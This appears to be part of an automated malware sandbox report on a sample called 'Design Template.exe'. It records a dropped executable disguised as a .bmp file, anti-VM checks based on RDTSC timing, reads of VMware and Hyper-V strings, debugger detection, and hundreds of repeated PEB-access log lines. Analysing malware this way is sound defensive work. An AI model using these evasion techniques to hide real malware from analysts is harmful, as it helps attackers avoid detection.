        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050BCBE push ss; ret 14_2_0050BCC5
        Source: initial sampleStatic PE information: section name: .text entropy: 7.31104749099
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004218A0 IsIconic,2_2_004218A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00421A45 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00421A45
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00427F30 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,2_2_00427F30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00427780 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,2_2_00427780
        Source: C:\Users\user\Desktop\Design Template.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\Design Template.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Design Template.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000004F85E4 second address: 00000000004F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000004F896E second address: 00000000004F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A36A60 rdtscp 4_2_00A36A60
        Source: C:\Users\user\Desktop\Design Template.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Windows\explorer.exe TID: 5548Thread sleep time: -45000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
        Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
        Source: explorer.exe, 00000007.00000002.516979804.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000007.00000000.299098647.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\Design Template.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A36A60 rdtscp 4_2_00A36A60
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004383A8 LdrLoadDll,2_2_004383A8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00426369
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043AA88 mov eax, dword ptr fs:[00000030h]2_2_0043AA88
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A6E8 mov eax, dword ptr fs:[00000030h]2_2_0043A6E8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A6F8 mov eax, dword ptr fs:[00000030h]2_2_0043A6F8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00435F68 mov ecx, dword ptr fs:[00000030h]2_2_00435F68
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A718 mov eax, dword ptr fs:[00000030h]2_2_0043A718
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A7B8 mov eax, dword ptr fs:[00000030h]2_2_0043A7B8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A490AF mov eax, dword ptr fs:[00000030h]4_2_00A490AF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09080 mov eax, dword ptr fs:[00000030h]4_2_00A09080
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]4_2_00A83884
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]4_2_00A83884
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A058EC mov eax, dword ptr fs:[00000030h]4_2_00A058EC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]4_2_00AD4015
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]4_2_00AD4015
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1074 mov eax, dword ptr fs:[00000030h]4_2_00AD1074
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC2073 mov eax, dword ptr fs:[00000030h]4_2_00AC2073
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]4_2_00A20050
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]4_2_00A20050
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]4_2_00A361A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]4_2_00A361A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A869A6 mov eax, dword ptr fs:[00000030h]4_2_00A869A6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C182 mov eax, dword ptr fs:[00000030h]4_2_00A2C182
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A185 mov eax, dword ptr fs:[00000030h]4_2_00A3A185
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32990 mov eax, dword ptr fs:[00000030h]4_2_00A32990
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A941E8 mov eax, dword ptr fs:[00000030h]4_2_00A941E8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov ecx, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]4_2_00A3513A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]4_2_00A3513A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C962 mov eax, dword ptr fs:[00000030h]4_2_00A0C962
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]4_2_00A0B171
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]4_2_00A0B171
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]4_2_00A2B944
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]4_2_00A2B944
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]4_2_00A1AAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]4_2_00A1AAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]4_2_00A3FAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]4_2_00A3D294
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]4_2_00A3D294
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32AE4 mov eax, dword ptr fs:[00000030h]4_2_00A32AE4
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32ACB mov eax, dword ptr fs:[00000030h]4_2_00A32ACB
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]4_2_00A44A2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]4_2_00A44A2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18A0A mov eax, dword ptr fs:[00000030h]4_2_00A18A0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov ecx, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]4_2_00A0AA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]4_2_00A0AA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]4_2_00ACAA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]4_2_00ACAA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A23A1C mov eax, dword ptr fs:[00000030h]4_2_00A23A1C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]4_2_00ABB260
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]4_2_00ABB260
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8A62 mov eax, dword ptr fs:[00000030h]4_2_00AD8A62
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4927A mov eax, dword ptr fs:[00000030h]4_2_00A4927A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACEA55 mov eax, dword ptr fs:[00000030h]4_2_00ACEA55
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A94257 mov eax, dword ptr fs:[00000030h]4_2_00A94257
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]4_2_00AD5BA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC138A mov eax, dword ptr fs:[00000030h]4_2_00AC138A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABD380 mov ecx, dword ptr fs:[00000030h]4_2_00ABD380
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]4_2_00A11B8F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]4_2_00A11B8F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3B390 mov eax, dword ptr fs:[00000030h]4_2_00A3B390
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32397 mov eax, dword ptr fs:[00000030h]4_2_00A32397
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]4_2_00A2DBE9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]4_2_00A853CA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]4_2_00A853CA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC131B mov eax, dword ptr fs:[00000030h]4_2_00AC131B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]4_2_00A0DB60
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]4_2_00A33B7A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]4_2_00A33B7A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB40 mov eax, dword ptr fs:[00000030h]4_2_00A0DB40
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8B58 mov eax, dword ptr fs:[00000030h]4_2_00AD8B58
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0F358 mov eax, dword ptr fs:[00000030h]4_2_00A0F358
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1849B mov eax, dword ptr fs:[00000030h]4_2_00A1849B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC14FB mov eax, dword ptr fs:[00000030h]4_2_00AC14FB
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]4_2_00AD8CD6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3BC2C mov eax, dword ptr fs:[00000030h]4_2_00A3BC2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2746D mov eax, dword ptr fs:[00000030h]4_2_00A2746D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A44B mov eax, dword ptr fs:[00000030h]4_2_00A3A44B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]4_2_00A9C450
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]4_2_00A9C450
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]4_2_00AD05AC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]4_2_00AD05AC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A335A1 mov eax, dword ptr fs:[00000030h]4_2_00A335A1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
